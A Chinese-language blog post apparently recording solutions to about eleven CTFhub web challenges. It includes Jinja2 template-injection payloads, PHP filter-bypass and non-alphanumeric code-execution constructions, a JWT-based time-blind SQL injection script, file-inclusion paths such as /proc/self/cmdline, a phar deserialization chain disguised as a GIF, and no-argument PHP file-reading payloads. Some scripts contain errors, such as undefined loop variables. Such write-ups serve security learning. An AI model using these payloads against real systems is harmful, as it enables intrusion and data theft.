CTFhub刷題記錄
阿新 • • 發佈:2020-12-27
一 [WesternCTF2018]shrine
沒什麼好說的,SSTI模版注入類問題,過濾了()但是我們不慌。開始注入,{{29*3}}測試通過。
發現是jinjia2的模版注入。關鍵點在於沒有(),並且還要獲取config檔案,就可以獲取到flag。
總結幾種常用的讀取config語句
1.{{config}} 2.{{self.__dict__}} 如果config和self和()都不能使用,就必須找到config的上層current_app 1.url_for.__globals__['current_app'].config['FLAG'] 2.get_flashed_messages.__globals__['current_app'].config['FLAG']
二 2017-賽客夏令營-Web-Injection V2.0
十分簡潔的一個介面,但是依然抵擋不住他這道題有多騷。
首先,我們得明白,登陸有兩種方式
-
select * from users where username = {$username} and password = {$password} -
$a = select password from users where username = {$username}; $a == {$password}
這是兩種常用的登陸模版,當然好像還有一種比較騷的,但是在語雀筆記上,注意看他的返回字元提醒
這道題會返回使用者不存在,很明顯就是我們的第一種註冊方式(當然還有可能就是這道題只允許admin登陸。還有時間盲注猜,等等。
三 第五空間大賽-hate_php
這裡主要是繞過,他對於內建函式的限制。
這裡其實就有兩種的bypass的方法
1.取反或異或繞過
通過(phpinfo)()這種 來進行函式的執行
2.字串的拼接
$a="syste";$b="m(%27cat%20flag.php%27);";$c=$a.$b;eval($c);
無字母getshell(限制長度)參考連結:https://www.cnblogs.com/wangtanzhi/p/12251619.html#autoid-0-1-0
各種php__rce:https://bbs.ichunqiu.com/thread-59273-1-1.html
簡單貼個指令碼備用:
import urllib.parse
find = ['G','E','T','_']//這裡沒有順序
for i in range(1,256):
for j in range(1,256):
result = chr(i^j)
if(result in find):
a = i.to_bytes(1,byteorder='big')
b = j.to_bytes(1,byteorder='big')
a = urllib.parse.quote(a)
b = urllib.parse.quote(b)
print("%s:%s^%s"%(result,a,b))
四 2020-RCTF-Web-calc
遮蔽了一些字母和不可見字元,還有一些亂七八糟的東西。跟上面的題類似,不論怎麼搞,直接胡亂擼他就完事了。我們取反之後就是一群不可見字元。(划走ing
這裡就又有一個小trick
<?php
$a = ((1/0).(1));
var_dump($a{0});
?>
這裡輸出的字元是I原理是php是弱型別的語言(nodejs就沒有這麼簡單艹)
$cmd = "phpinfo";#要執行的命令
$fin="";
$tables=
[
"9" => "(((9).(0)){0})",
"8" => "(((8).(0)){0})",
"7" => "(((7).(0)){0})",
"6" => "(((6).(0)){0})",
"5" => "(((5).(0)){0})",
"4" => "(((4).(0)){0})",
"3" => "(((3).(0)){0})",
"2" => "(((2).(0)){0})",
"1" => "(((1).(0)){0})",
"0" => "(((0).(0)){0})",
"~" => "((((0).(0)){0})|(((0/0).(0)){0}))",
"}" => "((((4).(0)){0})|(((1/0).(0)){0}))",
"|" => "((((4).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
"{" => "((((2).(0)){0})|(((1/0).(0)){0}))",
"z" => "((((2).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
"y" => "((((0).(0)){0})|(((1/0).(0)){0}))",
"x" => "((((0).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
"w" => "((((1).(0)){0})|(((1/0).(0)){2}))",
"v" => "((((0).(0)){0})|(((1/0).(0)){2}))",
"u" => "((((4).(0)){0})|(((0/0).(0)){1}))",
"t" => "((((4).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
"s" => "((((2).(0)){0})|(((0/0).(0)){1}))",
"r" => "((((2).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
"q" => "((((0).(0)){0})|(((0/0).(0)){1}))",
"p" => "((((0).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
"o" => "((((0/0).(0)){0})|(((-1).(1)){0}))",
"n" => "((((0/0).(0)){0})|((((4).(0)){0})&(((-1).(1)){0})))",
"m" => "((((0/0).(0)){1})|(((-1).(1)){0}))",
"l" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
"k" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
"j" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
"i" => "((((0/0).(0)){1})|((((8).(0)){0})&(((-1).(1)){0})))",
"h" => "(((((8).(0)){0})&(((-1).(1)){0}))|((((0/0).(0)){0})&(((0/0).(0)){1})))",
"g" => "((((1/0).(0)){2})|((((1).(0)){0})&(((-1).(1)){0})))",
"f" => "((((1/0).(0)){2})|((((4).(0)){0})&(((-1).(1)){0})))",
"e" => "((((0/0).(0)){1})|((((4).(0)){0})&(((-1).(1)){0})))",
"d" => "(((((0).(0)){0})|(((1/0).(0)){2}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
"c" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
"b" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
"a" => "((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0})))",
"`" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0}))))",
"O" => "((((0/0).(0)){0})|(((0/0).(0)){1}))",
"N" => "(((0/0).(0)){0})",
"M" => "(((((4).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
"L" => "((((0/0).(0)){0})&((((4).(0)){0})|(((1/0).(0)){0})))",
"K" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
"J" => "((((0/0).(0)){0})&((((2).(0)){0})|(((1/0).(0)){0})))",
"I" => "(((1/0).(0)){0})",
"H" => "((((0/0).(0)){0})&(((1/0).(0)){0}))",
"G" => "((((0/0).(0)){1})|(((1/0).(0)){2}))",
"F" => "(((1/0).(0)){2})",
"E" => "(((((4).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
"D" => "((((0/0).(0)){0})&((((4).(0)){0})|(((0/0).(0)){1})))",
"C" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
"B" => "((((0/0).(0)){0})&((((2).(0)){0})|(((0/0).(0)){1})))",
"A" => "(((0/0).(0)){1})",
"@" => "((((0/0).(0)){0})&(((0/0).(0)){1}))",
"?" => "((((2).(0)){0})|(((-1).(1)){0}))",
">" => "((((6).(0)){0})|(((8).(0)){0}))",
"=" => "((((0).(0)){0})|(((-1).(1)){0}))",
"<" => "((((4).(0)){0})|(((8).(0)){0}))",
";" => "((((2).(0)){0})|(((9).(0)){0}))",
":" => "((((2).(0)){0})|(((8).(0)){0}))",
"/" => "(((((2).(0)){0})|(((-1).(1)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
"." => "(((((6).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
"-" => "(((-1).(1)){0})",
"," => "((((-1).(1)){0})&((((0).(0)){0})|(((0/0).(0)){0})))",
"+" => "(((((2).(0)){0})|(((9).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
"*" => "(((((2).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
")" => "((((9).(0)){0})&(((-1).(1)){0}))",
"(" => "((((8).(0)){0})&(((-1).(1)){0}))",
"'" => "((((7).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
"&" => "((((6).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
"%" => "((((5).(0)){0})&(((-1).(1)){0}))",
"$" => "((((4).(0)){0})&(((-1).(1)){0}))",
"#" => "((((3).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
'"' => "((((2).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
"!" => "((((1).(0)){0})&(((-1).(1)){0}))"
];
for($i=0;$i<strlen($cmd);$i++) {
$fin = $fin.$tables[$cmd[$i]].'.';
}
echo substr($fin,0,strlen($fin)-1);
這裡再借助上面的(phpinfo)()來進行完美的繞過。
小trcik:nmap 可以直接讀取檔案 -il引數
五 js_on
弱口令登陸
這個key,讓我不得不看一下我的jwt
然後
這裡我的第一反應其實是xss或者ssti注入
結果是一道盲注,我確實是沒有想到這道題是這個騷做法。(聯絡一下開放的註冊埠,應該是注入,應該是注入,還有過濾空格,select這些,騷呀。
#!/usr/bin/python python3
#-*-coding:utf-8-*-
#CTF_2020網鼎杯_玄武組_Web題_js_on
import requests,jwt,time
url='http://f3837049ec024ba1a59616045d15741a29b3253216334191.cloudgame1.ichunqiu.com/'
key = 'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6'
flag = ''
for i1 in range(1,50):
for i2 in range(33,127):
time_start = time.time()
#生成組裝jwt,放入data,發出請求
user = '1234\'or/**/1=if(ord(substr((sele<>ct/**/load_file(\'//flag\')),'+str(a)+',1))='+str(i)+',sl<>eep(5),1)#'
encoded_jwt = jwt.encode({'user':user,'news':'1234'},key,algorithm='HS256')
data={ 'Cookie':'token='+str(encoded_jwt)}
res=requests.get(url,data=data)
if time.time() - time_start > 5:
flag += chr(i2)
print(flag)
六 picdown
有下載頁面的十拿九穩的檔案包含,然後介紹幾個常用的資料夾(學習linux牛鼻)
../../../../../proc/self/cmdline檢視當前正在執行的任務命令
常用的proc目錄:https://blog.csdn.net/shenhuxi_yu/article/details/79697792
/proc/pid/fd/ 這個目錄包含了程序開啟的每一個檔案的連結open打開了檔案,建立檔案描述符
然後後面就是無腦拼命令。
七 國賽 love_math
重點就在於hex2bin這個函數了,其他就是新建變數這些操作了。
八 國賽 CISCN-2019-華北賽區-Day2-Web-Web1
括號繞空格,這些基礎操作了。
九 CISCN-2019-華北賽區-Day1-Web-Web1
檔案下載是入後,發現原始碼洩漏的入口,進行原始碼的獲取,然後程式碼審計。
審計程式碼,構建pop鏈子就好了,當然離不開這些騷騷的協議了。最騷的上傳檔案和繞過,離不開我的phar協議,無視字尾,無視操作,只要有協議用。(巔峰極客的wp)
放上鍊接:https://xz.aliyun.com/t/2715
貼個指令碼(前面的反序列自己搞定。
<?php
class User
{
public $id;
public $age=null;
public $nickname=null;
public $backup;
public function __construct()
{
$this->nickname = new Reader();
$this->backup = "/flag";
}
}
class dbCtrl
{
public $token;
public function __construct()
{
$this->token = new User;
}
}
Class Reader{
public $filename;
public $result;
}
$y1ng = new dbCtrl();
$phar = new Phar("web1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($y1ng);//這是資料
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
@rename("web1.phar", "y1ng.gif");
compress.zlib://phar://ying.gif/test.txt
這樣聯合繞過協議的限制,它不香嗎?
十 BJDCTF-2020-Web-Cookie is so subtle!
這裡就是一個錯覺,有幾個點(原題,又忘了。。。
1.cookie中資料不需要url編碼傳輸
2.SSI的注入
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
檔案寫入,再加上SHTML的特徵基本就是SSI注入了
SSTI xss SSI 等等命令
十一 ByteCTF 2019 –WEB- Boring-Code
parse_url的繞過:https://www.jianshu.com/p/80ce73919edb
然後就是無引數的亂殺了。
貼上幾個payload(效果是讀取上層目錄
構建ascii的46,構建出.
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))))))))));
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));
exp:
import requests
import time
localtime = time.asctime( time.localtime(time.time()) )
url='http://challenge-72b9ac351e12c91b.sandbox.ctfhub.com:10080/code/'
while 1:
response=requests.post(url,data={'url':'compress.zlib://data:@baidu.com/baidu.com?,echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));'}).text
if 'ctfhub' in response:
print('flag:'+response+"\n",localtime)
break